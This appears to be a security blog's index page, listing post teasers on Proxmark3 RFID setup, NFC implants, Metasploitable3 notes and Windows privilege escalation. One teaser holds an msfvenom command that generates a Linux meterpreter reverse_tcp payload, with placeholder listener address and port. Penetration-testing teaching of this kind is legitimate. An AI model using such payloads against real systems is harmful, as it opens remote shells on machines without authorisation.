Posts

thumbnail
Proxmark 3 Dev - Tag enumeration

Basic tags There are a few tags that come with the proxmark3 dev. HF Tags - 13.56Mhz Mifare 1 S50 white PVC card Mifare Ultralight...

thumbnail
Proxmark 3 RDV2 Setup OSX

Proxmark 3 Dev unboxing So after a few weeks my ELECHOUSE proxmark 3 dev arrived. Shortly after assembling it, the supplied batter...

thumbnail
Proxmark 3 RDV4 - Bootloader Doesnt Understand CMD_BL_Version

## How to fix Bootloader Doesn’t Understand CMD_BL_Version So with a new install of the pm3 iceman client, we stumbled acros...

thumbnail
Proxmark 3 RDv4 Setup

Introduction The Proxmark3 Dev Kit 4 (RDV4) from RRG/ProxGrind is more compact/portable and brings various improvements to the ope...

thumbnail
Metasploitable3 Master Notes

These are my ongoing findings of metasploitable3. A Video/Tutorial of a setup guide will be posted later on. Nmap Scan Here are th...

thumbnail
Cyber Security Events

TechXLR8 2017 Location: Excel, London Event type: Technology Expo/Festival Event Photos: TechXLR8 is a festival of technology taki...

thumbnail
Implant Projects - Computer Authentication

This is possible on both windows and macOS. They’re are two key ways to get this to work, either with a HID method or a 3rd party ...

thumbnail
Implant Projects - NFC Phone unlock

So Google has removed the NFC smart lock feature from android, this was a big issue with much debate however there is a work aroun...

thumbnail
NetbiosX - Windows PrivEscal - Kernel Exploits

Windows Kernel Exploits Windows by default are vulnerable to several vulnerabilities that could allow an attacker to execute malic...

thumbnail
Generating Payloads with MsfVenom

LIST PAYLOADS BINARIES Linux msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Co...

KSEC Labs